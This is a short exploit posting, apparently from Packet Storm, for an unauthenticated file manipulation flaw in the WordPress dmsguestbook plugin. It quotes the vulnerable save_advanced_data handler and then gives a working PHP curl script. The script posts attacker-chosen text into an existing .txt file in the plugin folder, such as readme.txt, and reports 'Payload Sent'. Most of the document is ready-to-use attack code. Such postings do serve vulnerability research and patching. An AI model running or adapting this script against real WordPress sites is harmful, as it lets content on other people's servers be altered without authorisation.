http://packetstormsecurity.com/user/evex/ Author:Evex Title: WordPress dmsguestbook Plugin File Manipulation Description: wordpress dmsguestbook plugin is vulnerable to a file manipulation security issue it allows an unauthenicated attacker to put text into existing text files only <?php /* Vulnerability Code: if ($POSTVARIABLE['action'] =='save_advanced_data') { $abspath = str_replace("\\","/", ABSPATH); // check the folder variable if($POSTVARIABLE['folder']=="language/"){ $folder="language/"; } else {$folder="";} // check the file variable xxxx.txt if(preg_match('/^[a-z0-9]+\.+(txt)/i', $POSTVARIABLE['file'])==1) { $file=$POSTVARIABLE['file']; } else {$file="";} clearstatcache(); if (file_exists($abspath . "wp-content/plugins/dmsguestbook/" . $folder . $file)) { $handle = fopen($abspath . "wp-content/plugins/dmsguestbook/" . $folder . $file, "w"); $writetofile = str_replace("\\", "", $POSTVARIABLE['advanced_data']); fwrite($handle, $writetofile); fclose($handle); message("<b>" . __("saved", "dmsguestbook") . "...</b>",300,800); } else {message("<br /><b>" . __("File not found!", "dmsguestbook") . "</b>",300,800);} } */ $TEXTTOINJECT = 'INPUT TEXT HERE'; $TXTFILE = 'readme.txt'; # localhost/wp-content/plugins/dmsguestbook/readme.txt $url = "http://localhost/x/wordpress"; $ch = curl_init(); curl_setopt($ch,CURLOPT_POST,true); curl_setopt($ch,CURLOPT_POSTFIELDS,"action=save_advanced_data&file=$TXTFILE&advanced_data=$TEXTTOINJECT"); curl_setopt($ch,CURLOPT_RETURNTRANSFER,true); curl_setopt($ch,CURLOPT_URL,$url.'/wp-admin/admin.php?page=dmsguestbook'); curl_exec($ch); echo "Payload Sent\nUrl: $url/wp-content/plugins/dmsguestbook/readme.txt"; ?>